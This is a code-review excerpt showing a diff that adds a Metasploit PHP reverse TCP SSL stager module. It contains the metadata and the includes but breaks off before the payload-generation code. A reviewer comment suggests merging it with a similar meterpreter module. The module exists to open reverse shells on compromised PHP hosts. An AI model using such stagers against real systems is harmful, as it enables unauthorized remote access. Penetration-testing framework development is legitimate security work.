modules/payloads/stagers/php/reverse_tcp_ssl.rb

```diff
@@ -0,0 +1,56 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/payload/php'
+require 'msf/core/handler/reverse_tcp_ssl'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module MetasploitModule
+
+  CachedSize = 1318
+
+  include Msf::Payload::Stager
+  include Msf::Payload::Php
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'          => 'PHP Reverse TCP SSL Stager',
+      'Description'   => 'Reverse PHP connect back stager with checks for disabled functions and SSL encryption',
+      'Author'        => ['egypt', 'RageLtMan <rageltman[at]sempervictus>'],
+      'License'       => MSF_LICENSE,
+      'Platform'      => 'php',
+      'Arch'          => ARCH_PHP,
+      'Handler'       => Msf::Handler::ReverseTcpSsl,
+      'Stager'        => {'Payload' => ""}
+      ))
+  end
+
+  #
+  # Constructs the payload
+  #
+  def generate
```

Comment:
this is so much the same with the meterpreter single above, I'd like to see it merged somehow